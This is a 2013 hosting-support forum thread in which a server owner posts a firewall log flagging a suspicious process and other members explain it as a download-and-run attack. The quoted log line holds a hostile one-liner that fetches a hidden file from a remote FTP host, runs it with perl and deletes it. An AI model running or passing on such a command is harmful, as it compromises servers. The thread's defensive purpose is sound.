Strange "Suspicious Process" in the configserv logs

Douglas Taylor · Mar 4, 2013

Code:

Mar 4 20:09:42 ip-72-167-47-182 lfd[28771]: *Suspicious Process* PID:25132 PPID:25129 User:nobody Uptime:93156 secs EXE:/bin/bash CMD:sh -c cd /tmp;wget ftp://muske:[email protected]/.za.exe;curl -O ftp://muske:[email protected]/.za.exe;perl .za.exe;rm -rf .za

I have literally no idea who or what this is. Pointers? Thanks!

Zepplin · Mar 6, 2013

Files from a german Ip 85.214.65.162 have been downloaded to your server, you'll need to find all the files remove them and secure your server.

Similar thread here -- http://forums.cpanel.net/f5/hacked-perl-files-tmp-high-load-33571.html

quietFinn · Mar 6, 2013

Actually they are trying to download it, then execute it, and after that delete it, so there is nothing left to find

Douglas Taylor · Mar 6, 2013

quietFinn said:
Actually they are trying to download it, then execute it, and after that delete it, so there is nothing left to find

I chmod 700 wget and turning on mod_security in Apache and we'll see if that helps any.

Thread starter	Similar threads	Forum	Replies	Date
J	Strange programs running server	Security	2	Apr 10, 2022
R	Security advisor strange results	Security	20	Apr 15, 2021
R	Strange Virus in Cpanel	Security	6	Apr 13, 2021
B	Strange status in Apache status	Security	5	Mar 26, 2021
D	Strange error messages: lfd: Suspicious process running under user	Security	8	Sep 15, 2013

Search

Search

Strange "Suspicious Process" in the configserv logs

Douglas Taylor

Member

Zepplin

Well-Known Member

quietFinn

Well-Known Member

Douglas Taylor

Member